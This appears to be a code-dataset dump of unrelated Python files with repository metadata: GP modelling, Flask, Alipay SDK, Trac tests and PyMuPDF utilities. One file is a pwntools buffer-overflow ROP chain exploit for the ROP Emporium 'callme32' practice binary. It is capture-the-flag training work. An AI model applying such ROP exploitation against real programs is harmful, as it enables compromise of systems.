hack, can't instantiate negative sites nats2 but optim might take you there lambda_2 = tf.minimum(lambda_2, -eps * tf.ones_like(lambda_2)) # To match SVGP you need to eliminate this jitter for minibatching self.lambda_1.assign(lambda_1) self.lambda_2.assign(-2.0 * lambda_2) def prior_kl(self) -> tf.Tensor: """Returns the KL divergence KL[q(u)|p(u)]""" q_mu, q_sqrt = self.get_mean_chol_cov_inducing_posterior() return kullback_leiblers.prior_kl( self.inducing_variable, self.kernel, q_mu, q_sqrt, whiten=self.whiten ) def maximum_log_likelihood_objective(self) -> tf.Tensor: """The variational lower bound""" return self.elbo() def elbo(self) -> tf.Tensor: """ This gives a variational bound (the evidence lower bound or ELBO) on the log marginal likelihood of the model. """ X, Y = self.data kl = self.prior_kl() f_mean, f_var = self.predict_f(X, full_cov=False, full_output_cov=False) var_exp = self.likelihood.variational_expectations(f_mean, f_var, Y) if self.num_data is not None: num_data = tf.cast(self.num_data, kl.dtype) minibatch_size = tf.cast(tf.shape(X)[0], kl.dtype) scale = num_data / minibatch_size else: scale = tf.cast(1.0, kl.dtype) return tf.reduce_sum(var_exp) * scale - kl def predict_f(self, Xnew: InputData, full_cov=False, full_output_cov=False) -> MeanAndVariance: q_mu, q_sqrt = self.get_mean_chol_cov_inducing_posterior() mu, var = conditional( Xnew, self.inducing_variable, self.kernel, q_mu, q_sqrt=q_sqrt, full_cov=full_cov, white=self.whiten, full_output_cov=full_output_cov, ) return mu + self.mean_function(Xnew), var
35.317708
99
0.620557
795a9726cabaf8e22639fa8b878c30be4aa6d47f
241
py
Python
simple_flask/views/account.py
gavinliu4011/simple_flask
31139e702b72f31e79f837413ce7bb53f53ce89f
[ "Apache-2.0" ]
null
null
null
simple_flask/views/account.py
gavinliu4011/simple_flask
31139e702b72f31e79f837413ce7bb53f53ce89f
[ "Apache-2.0" ]
null
null
null
simple_flask/views/account.py
gavinliu4011/simple_flask
31139e702b72f31e79f837413ce7bb53f53ce89f
[ "Apache-2.0" ]
null
null
null
from flask import Blueprint from flask import render_template from flask import request account = Blueprint('account', __name__) @account.route('/login.html', methods=['GET', "POST"]) def login(): return render_template('login.html')
21.909091
54
0.746888
795a996a31e95c116b11a47be8f982629158cf27
3,558
py
Python
tests/util.py
lene/haeqs_ml
572a69e6e93f262a1708d6c72ac64bec4af6f791
[ "BSD-2-Clause" ]
null
null
null
tests/util.py
lene/haeqs_ml
572a69e6e93f262a1708d6c72ac64bec4af6f791
[ "BSD-2-Clause" ]
null
null
null
tests/util.py
lene/haeqs_ml
572a69e6e93f262a1708d6c72ac64bec4af6f791
[ "BSD-2-Clause" ]
null
null
null
from data_sets.images_labels_data_set import DataSetBase from data_sets.data_sets import DataSets import numpy __author__ = 'Lene Preuss <lene.preuss@gmail.com>' MINIMAL_INPUT_SIZE = 2 MINIMAL_LAYER_GEOMETRY = (2, 2) MINIMAL_OUTPUT_SIZE = 2 MINIMAL_BATCH_SIZE = 2 def create_minimal_input_placeholder(): return tf.placeholder(tf.float32, shape=(MINIMAL_BATCH_SIZE, MINIMAL_INPUT_SIZE)) def get_project_root_folder(): import os return os.path.dirname(os.path.dirname(__file__)) def create_train_data_set(): train_data = create_vector([0, 0, 1, 1]).reshape(2, 2) train_labels = create_vector([0, 1], numpy.int8).reshape(2) return DataSetBase(train_data, train_labels) def create_train_data_sets(): train_data = create_train_data_set() return DataSets(train_data, train_data, train_data) def create_vector(values, type=numpy.float32): return numpy.fromiter(values, numpy.dtype(type)) def train_data_input(value): return create_vector([value, value]) def train_neural_network(train_data, graph=None): data_sets = DataSets(train_data, train_data, train_data) if graph is None: graph = NeuralNetworkGraph(train_data.input.shape[0], MINIMAL_LAYER_GEOMETRY, len(train_data.labels)) init_graph(graph) graph.train( data_sets=data_sets, steps_between_checks=50, max_steps=1000, batch_size=train_data.num_examples, precision=0.99 ) return graph def init_graph(graph, session=None): graph.init_trainer() graph.set_session(session) return graph def allow_fail(max_times_fail=1, silent=True): """Runs a test, if necessary repeatedly, allowing it to fail up to max_times_fail times. Usage: @allow_fail def test: ... # allows the test to be repeated once before considering the test failed @allow_fail(max_times_fail=2, silent=False) def test(): ... # allows the test to be repeated twice, printing a message on each failure This is useful if a test tests non-deterministic behavior, such as with stochastic algorithms. If the tests fails with probability p < 1, allowing it to fail n times causes the resulting test to fail with probability p^(n+1) < p. In particular it was written to test neural networks which are initialized randomly. :param max_times_fail: How often a test may fail before considering the test failed. :param silent: If False, prints a message before running the test and on each failure. :return: The decorated test method """ def allow_fail_decorator(func): """ :param func: The test allowed to be run repeatedly if it fails. :return: The decorated test function """ def run_test_checked(self): """ Runs the test, repeating it up to max_times_fail times if it fails. :param self: The test suite, presumably an object of type unittest.TestCase """ if not silent: print( '\ntrying {}.{}() max. {} times'.format( type(self).__name__, func.__name__, max_times_fail + 1 ) ) for i in range(max_times_fail): try: func(self) return except AssertionError: if not silent: print('failed {} times'.format(i+1)) # run the test unguarded for a last time func(self) return run_test_checked return allow_fail_decorator
31.486726
109
0.669758
795a9a24a2265068119948eca50bc7a8a5070c30
2,321
py
Python
pwn/rop_emporium/03-callme/32-bit/exploit.py
An00bRektn/CTF
f009b8dee93dfc28a1e3f335f8997a74b2cad653
[ "MIT" ]
null
null
null
pwn/rop_emporium/03-callme/32-bit/exploit.py
An00bRektn/CTF
f009b8dee93dfc28a1e3f335f8997a74b2cad653
[ "MIT" ]
null
null
null
pwn/rop_emporium/03-callme/32-bit/exploit.py
An00bRektn/CTF
f009b8dee93dfc28a1e3f335f8997a74b2cad653
[ "MIT" ]
null
null
null
#!/usr/bin/python3 from pwn import * # Allows you to switch between local/GDB/remote from terminal def start(argv=[], *a, **kw): if args.GDB: # Set GDBscript below return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw) elif args.REMOTE: # ('server', 'port') return remote(sys.argv[1], sys.argv[2], *a, **kw) else: # Run locally return process([exe] + argv, *a, **kw) def find_ip(payload): p = process(exe) p.sendlineafter('> ', payload) # Wait for the process to crash p.wait() # Print out the address of EIP/RIP at the time of crashing ip_offset = cyclic_find(p.corefile.pc) # x86 #ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4)) # x64 info('located EIP/RIP offset at {a}'.format(a=ip_offset)) return ip_offset # Specify your GDB script here for debugging gdbscript = ''' break main '''.format(**locals()) # Set up pwntools for the correct architecture exe = './callme32' # This will automatically get context arch, bits, os etc elf = context.binary = ELF(exe, checksec=False) # Enable verbose logging so we can see exactly what is being sent (info/debug) context.log_level = 'debug' #=========================================================== # EXPLOIT GOES HERE #=========================================================== offset = 44 # find_ip(cyclic(100)) # Per the instructions param_1 = 0xdeadbeef param_2 = 0xcafebabe param_3 = 0xd00df00d io = start() # Note that these are all @plt addresses # Obtained via gdb: info functions callme_one = 0x080484f0 callme_two = 0x08048550 callme_three = 0x080484e0 # 0x080487f9: pop esi; pop edi; pop ebp; ret; pop_esi_edi_ebp_ret = 0x080487f9 # We need this gadget so we can restore the state of the stack # after each function call payload = flat({ offset: [ callme_one, pop_esi_edi_ebp_ret, param_1, param_2, param_3, callme_two, pop_esi_edi_ebp_ret, param_1, param_2, param_3, callme_three, pop_esi_edi_ebp_ret, param_1, param_2, param_3, ] }) io.sendlineafter("> ", payload) io.recvuntil('callme_two() called correctly\n') flag = io.recv() log.success(flag.decode("utf-8"))
27.305882
98
0.609651
795a9af0307b379c3c302a945fd2048a78805144
715
py
Python
python/packages/isce3/geometry/Geo2rdr.py
piyushrpt/isce3
1741af321470cb5939693459765d11a19c5c6fc2
[ "Apache-2.0" ]
null
null
null
python/packages/isce3/geometry/Geo2rdr.py
piyushrpt/isce3
1741af321470cb5939693459765d11a19c5c6fc2
[ "Apache-2.0" ]
null
null
null
python/packages/isce3/geometry/Geo2rdr.py
piyushrpt/isce3
1741af321470cb5939693459765d11a19c5c6fc2
[ "Apache-2.0" ]
null
null
null
#-*- coding: utf-8 -*- # # Heresh Fattahi, Bryan Riel # Copyright 2019- # The extensions from .. import isceextension class Geo2rdr(isceextension.pyGeo2rdr): """ Wrapper for Geo2rdr """ pass def geo2rdr_point(lonlatheight, ellipsoid, orbit, doppler, wavelength, side, threshold=0.05, maxiter=50, dR=1.0e-8): """ Wrapper for py_geo2rdr standalone function. """ azimuthTime, slantRange = isceextension.py_geo2rdr( lonlatheight, ellipsoid, orbit, doppler, wavelength, side, threshold=threshold, maxiter=maxiter, dR=dR ) return azimuthTime, slantRange
19.861111
55
0.584615
795a9c93aee2c7573c24d437de7b58ace7a20c39
875
py
Python
trac/notification/tests/__init__.py
clubturbo/Trac-1.4.2
254ce54a3c2fb86b4f31810ddeabbd4ff8b54a78
[ "BSD-3-Clause" ]
null
null
null
trac/notification/tests/__init__.py
clubturbo/Trac-1.4.2
254ce54a3c2fb86b4f31810ddeabbd4ff8b54a78
[ "BSD-3-Clause" ]
null
null
null
trac/notification/tests/__init__.py
clubturbo/Trac-1.4.2
254ce54a3c2fb86b4f31810ddeabbd4ff8b54a78
[ "BSD-3-Clause" ]
null
null
null
# -*- coding: utf-8 -*- # # Copyright (C) 2015-2020 Edgewall Software # All rights reserved. # # This software is licensed as described in the file COPYING, which # you should have received as part of this distribution. The terms # are also available at https://trac.edgewall.org/wiki/TracLicense. # # This software consists of voluntary contributions made by many # individuals. For the exact contribution history, see the revision # history and logs, available at https://trac.edgewall.org/log/. import unittest from . import api, mail, model, prefs def test_suite(): suite = unittest.TestSuite() suite.addTest(api.test_suite()) suite.addTest(mail.test_suite()) suite.addTest(model.test_suite()) suite.addTest(prefs.test_suite()) return suite if __name__ == '__main__': unittest.main(defaultTest='test_suite')
29.166667
68
0.709714
795a9d7ba286ea0359a3fd23df307d61380e61bc
324
py
Python
tests/system/brbeat.py
mlositsky/brbeat
b9858c3b2e7fbd689f8f043edfb876bfe6de7b9a
[ "Apache-2.0" ]
null
null
null
tests/system/brbeat.py
mlositsky/brbeat
b9858c3b2e7fbd689f8f043edfb876bfe6de7b9a
[ "Apache-2.0" ]
null
null
null
tests/system/brbeat.py
mlositsky/brbeat
b9858c3b2e7fbd689f8f043edfb876bfe6de7b9a
[ "Apache-2.0" ]
null
null
null
import sys sys.path.append('../../vendor/github.com/elastic/beats/libbeat/tests/system') from beat.beat import TestCase class BaseTest(TestCase): @classmethod def setUpClass(self): self.beat_name = "brbeat" self.build_path = "../../build/system-tests/" self.beat_path = "../../brbeat.test"
27
77
0.660494
795a9e2edef673bb75564472c51a3d3dd00bf5a3
3,992
py
Python
alipay/aop/api/request/AlipayDataIotdataDataDetailQueryRequest.py
snowxmas/alipay-sdk-python-all
96870ced60facd96c5bce18d19371720cbda3317
[ "Apache-2.0" ]
213
2018-08-27T16:49:32.000Z
2021-12-29T04:34:12.000Z
alipay/aop/api/request/AlipayDataIotdataDataDetailQueryRequest.py
snowxmas/alipay-sdk-python-all
96870ced60facd96c5bce18d19371720cbda3317
[ "Apache-2.0" ]
29
2018-09-29T06:43:00.000Z
2021-09-02T03:27:32.000Z
alipay/aop/api/request/AlipayDataIotdataDataDetailQueryRequest.py
snowxmas/alipay-sdk-python-all
96870ced60facd96c5bce18d19371720cbda3317
[ "Apache-2.0" ]
59
2018-08-27T16:59:26.000Z
2022-03-25T10:08:15.000Z
#!/usr/bin/env python # -*- coding: utf-8 -*- import json from alipay.aop.api.FileItem import FileItem from alipay.aop.api.constant.ParamConstants import * from alipay.aop.api.domain.AlipayDataIotdataDataDetailQueryModel import AlipayDataIotdataDataDetailQueryModel class AlipayDataIotdataDataDetailQueryRequest(object): def __init__(self, biz_model=None): self._biz_model = biz_model self._biz_content = None self._version = "1.0" self._terminal_type = None self._terminal_info = None self._prod_code = None self._notify_url = None self._return_url = None self._udf_params = None self._need_encrypt = False @property def biz_model(self): return self._biz_model @biz_model.setter def biz_model(self, value): self._biz_model = value @property def biz_content(self): return self._biz_content @biz_content.setter def biz_content(self, value): if isinstance(value, AlipayDataIotdataDataDetailQueryModel): self._biz_content = value else: self._biz_content = AlipayDataIotdataDataDetailQueryModel.from_alipay_dict(value) @property def version(self): return self._version @version.setter def version(self, value): self._version = value @property def terminal_type(self): return self._terminal_type @terminal_type.setter def terminal_type(self, value): self._terminal_type = value @property def terminal_info(self): return self._terminal_info @terminal_info.setter def terminal_info(self, value): self._terminal_info = value @property def prod_code(self): return self._prod_code @prod_code.setter def prod_code(self, value): self._prod_code = value @property def notify_url(self): return self._notify_url @notify_url.setter def notify_url(self, value): self._notify_url = value @property def return_url(self): return self._return_url @return_url.setter def return_url(self, value): self._return_url = value @property def udf_params(self): return self._udf_params @udf_params.setter def udf_params(self, value): if not isinstance(value, dict): return self._udf_params = value @property def need_encrypt(self): return self._need_encrypt @need_encrypt.setter def need_encrypt(self, value): self._need_encrypt = value def add_other_text_param(self, key, value): if not self.udf_params: self.udf_params = dict() self.udf_params[key] = value def get_params(self): params = dict() params[P_METHOD] = 'alipay.data.iotdata.data.detail.query' params[P_VERSION] = self.version if self.biz_model: params[P_BIZ_CONTENT] = json.dumps(obj=self.biz_model.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':')) if self.biz_content: if hasattr(self.biz_content, 'to_alipay_dict'): params['biz_content'] = json.dumps(obj=self.biz_content.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':')) else: params['biz_content'] = self.biz_content if self.terminal_type: params['terminal_type'] = self.terminal_type if self.terminal_info: params['terminal_info'] = self.terminal_info if self.prod_code: params['prod_code'] = self.prod_code if self.notify_url: params['notify_url'] = self.notify_url if self.return_url: params['return_url'] = self.return_url if self.udf_params: params.update(self.udf_params) return params def get_multipart_params(self): multipart_params = dict() return multipart_params
27.531034
148
0.646293
795a9e3661ec107f0ad658d721067a3093373064
107,486
py
Python
libs/fitz/utils.py
rocketbot-cl/Pdf2Jpg
2ea2b89af51ea77e73bbfe4f6b47d18028d8e2d8
[ "MIT" ]
null
null
null
libs/fitz/utils.py
rocketbot-cl/Pdf2Jpg
2ea2b89af51ea77e73bbfe4f6b47d18028d8e2d8
[ "MIT" ]
null
null
null
libs/fitz/utils.py
rocketbot-cl/Pdf2Jpg
2ea2b89af51ea77e73bbfe4f6b47d18028d8e2d8
[ "MIT" ]
1
2022-03-29T15:36:24.000Z
2022-03-29T15:36:24.000Z
from __future__ import division from fitz import * import math import os import warnings import io """ The following is a collection of functions to extend PyMupdf. """ def showPDFpage( page, rect, src, pno=0, overlay=True, keep_proportion=True, rotate=0, reuse_xref=0, clip=None, ): """Show page number 'pno' of PDF 'src' in rectangle 'rect'. Args: rect: (rect-like) where to place the source image src: (document) source PDF pno: (int) source page number overlay: (bool) put in foreground keep_proportion: (bool) do not change width-height-ratio rotate: (int) degrees (multiple of 90) clip: (rect-like) part of source page rectangle Returns: xref of inserted object (for reuse) """ def calc_matrix(sr, tr, keep=True, rotate=0): """ Calculate transformation matrix from source to target rect. Notes: The product of four matrices in this sequence: (1) translate correct source corner to origin, (2) rotate, (3) scale, (4) translate to target's top-left corner. Args: sr: source rect in PDF (!) coordinate system tr: target rect in PDF coordinate system keep: whether to keep source ratio of width to height rotate: rotation angle in degrees Returns: Transformation matrix. """ # calc center point of source rect smp = Point((sr.x1 + sr.x0) / 2., (sr.y1 + sr.y0) / 2.) # calc center point of target rect tmp = Point((tr.x1 + tr.x0) / 2., (tr.y1 + tr.y0) / 2.) rot = Matrix(rotate) # rotation matrix # m moves to (0, 0), then rotates m = Matrix(1, 0, 0, 1, -smp.x, -smp.y) * rot sr1 = sr * m # resulting source rect to calculate scale factors fw = tr.width / sr1.width # scale the width fh = tr.height / sr1.height # scale the height if keep: fw = fh = min(fw, fh) # take min if keeping aspect ratio m *= Matrix(fw, fh) # concat scale matrix m *= Matrix(1, 0, 0, 1, tmp.x, tmp.y) # concat move to target center return m CheckParent(page) doc = page.parent if not doc.isPDF or not src.isPDF: raise ValueError("not a PDF") rect = page.rect & rect # intersect with page rectangle if rect.isEmpty or rect.isInfinite: raise ValueError("rect must be finite and not empty") if reuse_xref > 0: warnings.warn("ignoring 'reuse_xref'", DeprecationWarning) while pno < 0: # support negative page numbers pno += len(src) src_page = src[pno] # load ource page if len(src_page._getContents()) == 0: raise ValueError("nothing to show - source page empty") tar_rect = rect * ~page._getTransformation() # target rect in PDF coordinates src_rect = src_page.rect if not clip else src_page.rect & clip # source rect if src_rect.isEmpty or src_rect.isInfinite: raise ValueError("clip must be finite and not empty") src_rect = src_rect * ~src_page._getTransformation() # ... in PDF coord matrix = calc_matrix(src_rect, tar_rect, keep=keep_proportion, rotate=rotate) # list of existing /Form /XObjects ilst = [i[1] for i in doc._getPageInfo(page.number, 3)] # create a name that is not in that list n = "fzFrm" i = 0 _imgname = n + "0" while _imgname in ilst: i += 1 _imgname = n + str(i) isrc = src._graft_id # used as key for graftmaps if doc._graft_id == isrc: raise ValueError("source document must not equal target") # check if we have already copied objects from this source doc if isrc in doc.Graftmaps: # yes: use the old graftmap gmap = doc.Graftmaps[isrc] else: # no: make a new graftmap gmap = Graftmap(doc) doc.Graftmaps[isrc] = gmap # take note of generated xref for automatic reuse pno_id = (isrc, pno) # id of src[pno] xref = doc.ShownPages.get(pno_id, 0) xref = page._showPDFpage( src_page, overlay=overlay, matrix=matrix, xref=xref, clip=src_rect, graftmap=gmap, _imgname=_imgname, ) doc.ShownPages[pno_id] = xref return xref def insertImage(page, rect, filename=None, pixmap=None, stream=None, rotate=0, keep_proportion = True, overlay=True): """Insert an image in a rectangle on the current page. Notes: Exactly one of filename, pixmap or stream must be provided. Args: rect: (rect-like) where to place the source image filename: (str) name of an image file pixmap: (obj) a Pixmap object stream: (bytes) an image in memory rotate: (int) degrees (multiple of 90) keep_proportion: (bool) whether to maintain aspect ratio overlay: (bool) put in foreground """ def calc_matrix(fw, fh, tr, rotate=0): """ Calculate transformation matrix for image insertion. Notes: The image will preserve its aspect ratio if and only if arguments fw, fh are both equal to 1. Args: fw, fh: width / height ratio factors of image - floats in (0,1]. At least one of them (corresponding to the longer side) is equal to 1. tr: target rect in PDF coordinates rotate: rotation angle in degrees Returns: Transformation matrix. """ # center point of target rect tmp = Point((tr.x1 + tr.x0) / 2., (tr.y1 + tr.y0) / 2.) rot = Matrix(rotate) # rotation matrix # matrix m moves image center to (0, 0), then rotates m = Matrix(1, 0, 0, 1, -0.5, -0.5) * rot #sr1 = sr * m # resulting image rect # -------------------------------------------------------------------- # calculate the scale matrix # -------------------------------------------------------------------- small = min(fw, fh) # factor of the smaller side if rotate not in (0, 180): fw, fh = fh, fw # width / height exchange their roles if fw < 1: # portrait if tr.width / fw > tr.height / fh: w = tr.height * small h = tr.height else: w = tr.width h = tr.width / small elif fw != fh: # landscape if tr.width / fw > tr.height / fh: w = tr.height / small h = tr.height else: w = tr.width h = tr.width * small else: # (treated as) equal sided w = tr.width h = tr.height m *= Matrix(w, h) # concat scale matrix m *= Matrix(1, 0, 0, 1, tmp.x, tmp.y) # concat move to target center return m # ------------------------------------------------------------------------- CheckParent(page) doc = page.parent if not doc.isPDF: raise ValueError("not a PDF") if bool(filename) + bool(stream) + bool(pixmap) != 1: raise ValueError("need exactly one of filename, pixmap, stream") if filename and not os.path.exists(filename): raise FileNotFoundError("No such file: '%s'" % filename) elif stream and type(stream) not in (bytes, bytearray, io.BytesIO): raise ValueError("stream must be bytes-like or BytesIO") elif pixmap and type(pixmap) is not Pixmap: raise ValueError("pixmap must be a Pixmap") while rotate < 0: rotate += 360 while rotate >= 360: rotate -= 360 if rotate not in (0, 90, 180, 270): raise ValueError("bad rotate value") r = page.rect & rect if r.isEmpty or r.isInfinite: raise ValueError("rect must be finite and not empty") _imgpointer = None # ------------------------------------------------------------------------- # Calculate the matrix for image insertion. # ------------------------------------------------------------------------- # If aspect ratio must be kept, we need to know image width and height. # Easy for pixmaps. For file and stream cases, we make an fz_image and # take those values from it. In this case, we also hand the fz_image over # to the actual C-level function (_imgpointer), and set all other # parameters to None. # ------------------------------------------------------------------------- if keep_proportion is True: # for this we need the image dimension if pixmap: # this is the easy case w = pixmap.width h = pixmap.height elif stream: # use tool to access the information # we also pass through the generated fz_image address if type(stream) is io.BytesIO: stream = stream.getvalue() img_prof = TOOLS.image_profile(stream, keep_image=True) w, h = img_prof["width"], img_prof["height"] stream = None # make sure this arg is NOT used _imgpointer = img_prof["image"] # pointer to fz_image else: # worst case: must read the file img = open(filename, "rb") stream = img.read() img_prof = TOOLS.image_profile(stream, keep_image=True) w, h = img_prof["width"], img_prof["height"] stream = None # make sure this arg is NOT used filename = None # make sure this arg is NOT used img.close() # close image file _imgpointer = img_prof["image"] # pointer to fz_image maxf = max(w, h) fw = w / maxf fh = h / maxf else: fw = fh = 1.0 clip = r * ~page._getTransformation() # target rect in PDF coordinates matrix = calc_matrix(fw, fh, clip, rotate=rotate) # calculate matrix # Create a unique image reference name. First make existing names list. ilst = [i[7] for i in doc.getPageImageList(page.number)] # existing names n = "fzImg" # 'fitz image' i = 0 _imgname = n + "0" # first name candidate while _imgname in ilst: i += 1 _imgname = n + str(i) # try new name page._insertImage( filename=filename, # image in file pixmap=pixmap, # image in pixmap stream=stream, # image in memory matrix=matrix, # generated matrix overlay=overlay, _imgname=_imgname, # generated PDF resource name _imgpointer=_imgpointer, # address of fz_image ) def getImageBbox(page, item): """Calculate the rectangle (bbox) of a PDF image. Args: :page: the PyMuPDF page object :item: item from doc.getPageImageList(page.number, full=True) Returns: The bbox (fitz.Rect) of the image. Notes: This function can be used to find a connection between images returned by page.getText("dict") and the images referenced in the list page.getImageList(). """ def calc_matrix(cont, imgname): imgnm = ("/" + imgname).encode() cont = cont.replace(b"/", b" /") # prepend slashes with a space # split this, ignoring white spaces cont = cont.split() if imgnm not in cont: return Matrix() idx = cont.index(imgnm) # the image name mat_list = [] while idx >= 0: # start position is "/Image Do" location if cont[idx] == b"q": # finished at leading stacking command break if cont[idx] == b"cm": # encountered a matrix command mat = cont[idx - 6 : idx] # list of the 6 matrix values l = list(map(float, mat)) # make them floats mat_list.append(Matrix(l)) # append fitz matrix idx -= 6 # step backwards 6 entries else: idx -= 1 # step backwards l = len(mat_list) if l == 0: # safeguard against unusual situations return Matrix() # the zero matrix mat = Matrix(1, 1) # concatenate encountered matrices to this one for m in reversed(mat_list): mat *= m return mat def lookup_matrix(page, item): """Return the transformation matrix for an image name. Args: :page: the PyMuPDF page object :item: an item of the list doc.getPageImageList(page.number, full=True). Returns: concatenated matrices preceeding the image invocation. Notes: We are looking up "/imgname Do" in the concatenated /contents of the page first. If not found, also look it up in the streams of any Form XObjects of the page. If still not found, return the zero matrix. """ doc = page.parent # get the PDF document imgname = item[7] # the image reference name stream_xref = item[-1] # the contents object to inspect if stream_xref == 0: # only look in the page's /Contents if not getattr(page, "is_cleaned", False): page._cleanContents() # sanitize image invocation matrices page.is_cleaned = True xref = page._getContents()[0] # the (only) contents object cont = doc._getXrefStream(xref) # the contents object return calc_matrix(cont, imgname) cont = doc._getXrefStream(stream_xref) # the contents object return calc_matrix(cont, imgname) mat = lookup_matrix(page, item) if not bool(mat): return Rect(1, 1, -1, -1) # return infinite rect if not found ctm = page._getTransformation() # page transformation matrix mat.preScale(1, -1) # fiddle the matrix mat.preTranslate(0, -1) # fiddle the matrix r = Rect(0, 0, 1, 1) * mat # the bbox in PDF coordinates return r * ctm # the bbox in MuPDF coordinates def searchFor(page, text, hit_max = 16, quads = False, flags=None): """ Search for a string on a page. Args: text: string to be searched for hit_max: maximum hits quads: return quads instead of rectangles Returns: a list of rectangles or quads, each containing one occurrence. """ CheckParent(page) if flags is None: flags = TEXT_PRESERVE_LIGATURES | TEXT_PRESERVE_WHITESPACE tp = page.getTextPage(flags) # create TextPage # return list of hitting reactangles rlist = tp.search(text, hit_max = hit_max, quads = quads) tp = None return rlist def searchPageFor(doc, pno, text, hit_max=16, quads=False, flags=None): """ Search for a string on a page. Args: pno: page number text: string to be searched for hit_max: maximum hits quads: return quads instead of rectangles Returns: a list of rectangles or quads, each containing an occurrence. """ return doc[pno].searchFor(text, hit_max = hit_max, quads = quads, flags=flags) def getTextBlocks(page, flags=None): """Return the text blocks on a page. Notes: Lines in a block are concatenated with line breaks. Args: flags: (int) control the amount of data parsed into the textpage. Returns: A list of the blocks. Each item contains the containing rectangle coordinates, text lines, block type and running block number. """ CheckParent(page) if flags is None: flags = TEXT_PRESERVE_LIGATURES | TEXT_PRESERVE_WHITESPACE tp = page.getTextPage(flags) l = [] tp.extractBLOCKS(l) del tp return l def getTextWords(page, flags=None): """Return the text words as a list with the bbox for each word. Args: flags: (int) control the amount of data parsed into the textpage. """ CheckParent(page) if flags is None: flags = TEXT_PRESERVE_LIGATURES | TEXT_PRESERVE_WHITESPACE tp = page.getTextPage(flags) l = [] tp.extractWORDS(l) del tp return l def getText(page, output="text", flags=None): """ Extract a document page's text. Args: output: (str) text, html, dict, json, rawdict, xhtml or xml. Returns: the output of TextPage methods extractText, extractHTML, extractDICT, extractJSON, extractRAWDICT, extractXHTML or etractXML respectively. Default and misspelling choice is "text". """ output = output.lower() if output == "words": return getTextWords(page, flags=flags) if output == "blocks": return getTextBlocks(page, flags=flags) CheckParent(page) # available output types formats = ("text", "html", "json", "xml", "xhtml", "dict", "rawdict") if output not in formats: output = "text" # choose which of them also include images in the TextPage images = (0, 1, 1, 0, 1, 1, 1) # controls image inclusion in text page f = formats.index(output) if flags is None: flags = TEXT_PRESERVE_LIGATURES | TEXT_PRESERVE_WHITESPACE if images[f] == 1: flags |= TEXT_PRESERVE_IMAGES tp = page.getTextPage(flags) # TextPage with or without images if f == 2: t = tp.extractJSON() elif f == 5: t = tp.extractDICT() elif f == 6: t = tp.extractRAWDICT() else: t = tp._extractText(f) del tp return t def getPageText(doc, pno, output="text"): """ Extract a document page's text by page number. Notes: Convenience function calling page.getText(). Args: pno: page number output: (str) text, html, dict, json, rawdict, xhtml or xml. Returns: output from page.TextPage(). """ return doc[pno].getText(output) def getPixmap(page, matrix=None, colorspace=csRGB, clip=None, alpha=False, annots=True): """Create pixmap of page. Args: matrix: Matrix for transformation (default: Identity). colorspace: (str/Colorspace) cmyk, rgb, gray - case ignored, default csRGB. clip: (irect-like) restrict rendering to this area. alpha: (bool) whether to include alpha channel annots: (bool) whether to also render annotations """ CheckParent(page) doc = page.parent if type(colorspace) is str: if colorspace.upper() == "GRAY": colorspace = csGRAY elif colorspace.upper() == "CMYK": colorspace = csCMYK else: colorspace = csRGB if colorspace.n not in (1, 3, 4): raise ValueError("unsupported colorspace") return page._makePixmap(doc, matrix, colorspace, alpha, annots, clip) def getPagePixmap(doc, pno, matrix=None, colorspace=csRGB, clip=None, alpha=False, annots=True, ): """Create pixmap of document page by page number. Notes: Convenience function calling page.getPixmap. Args: pno: (int) page number matrix: Matrix for transformation (default: Identity). colorspace: (str,Colorspace) rgb, rgb, gray - case ignored, default csRGB. clip: (irect-like) restrict rendering to this area. alpha: (bool) include alpha channel annots: (bool) also render annotations """ return doc[pno].getPixmap(matrix=matrix, colorspace=colorspace, clip=clip, alpha=alpha, annots=annots, ) def getLinkDict(ln): nl = {"kind": ln.dest.kind, "xref": 0} try: nl["from"] = ln.rect except: pass pnt = Point(0, 0) if ln.dest.flags & LINK_FLAG_L_VALID: pnt.x = ln.dest.lt.x if ln.dest.flags & LINK_FLAG_T_VALID: pnt.y = ln.dest.lt.y if ln.dest.kind == LINK_URI: nl["uri"] = ln.dest.uri elif ln.dest.kind == LINK_GOTO: nl["page"] = ln.dest.page nl["to"] = pnt if ln.dest.flags & LINK_FLAG_R_IS_ZOOM: nl["zoom"] = ln.dest.rb.x else: nl["zoom"] = 0.0 elif ln.dest.kind == LINK_GOTOR: nl["file"] = ln.dest.fileSpec.replace("\\", "/") nl["page"] = ln.dest.page if ln.dest.page < 0: nl["to"] = ln.dest.dest else: nl["to"] = pnt if ln.dest.flags & LINK_FLAG_R_IS_ZOOM: nl["zoom"] = ln.dest.rb.x else: nl["zoom"] = 0.0 elif ln.dest.kind == LINK_LAUNCH: nl["file"] = ln.dest.fileSpec.replace("\\", "/") elif ln.dest.kind == LINK_NAMED: nl["name"] = ln.dest.named else: nl["page"] = ln.dest.page return nl def getLinks(page): """Create a list of all links contained in a PDF page. Notes: see PyMuPDF ducmentation for details. """ CheckParent(page) ln = page.firstLink links = [] while ln: nl = getLinkDict(ln) #if nl["kind"] == LINK_GOTO: # if type(nl["to"]) is Point and nl["page"] >= 0: # doc = page.parent # target_page = doc[nl["page"]] # ctm = target_page._getTransformation() # point = nl["to"] * ctm # nl["to"] = point links.append(nl) ln = ln.next if len(links) > 0: linkxrefs = page._getLinkXrefs() if len(linkxrefs) == len(links): for i in range(len(linkxrefs)): links[i]["xref"] = linkxrefs[i] return links def getToC(doc, simple = True): """Create a table of contents. Args: simple: a bool to control output. Returns a list, where each entry consists of outline level, title, page number and link destination (if simple = False). For details see PyMuPDF's documentation. """ def recurse(olItem, liste, lvl): '''Recursively follow the outline item chain and record item information in a list.''' while olItem: if olItem.title: title = olItem.title else: title = " " if not olItem.isExternal: if olItem.uri: page = olItem.page + 1 else: page = -1 else: page = -1 if not simple: link = getLinkDict(olItem) liste.append([lvl, title, page, link]) else: liste.append([lvl, title, page]) if olItem.down: liste = recurse(olItem.down, liste, lvl+1) olItem = olItem.next return liste # check if document is open and not encrypted if doc.isClosed: raise ValueError("document closed") doc.initData() olItem = doc.outline if not olItem: return [] lvl = 1 liste = [] return recurse(olItem, liste, lvl) def getRectArea(*args): """Calculate area of rectangle.\nparameter is one of 'px' (default), 'in', 'cm', or 'mm'.""" rect = args[0] if len(args) > 1: unit = args[1] else: unit = "px" u = {"px": (1,1), "in": (1.,72.), "cm": (2.54, 72.), "mm": (25.4, 72.)} f = (u[unit][0] / u[unit][1])**2 return f * rect.width * rect.height def setMetadata(doc, 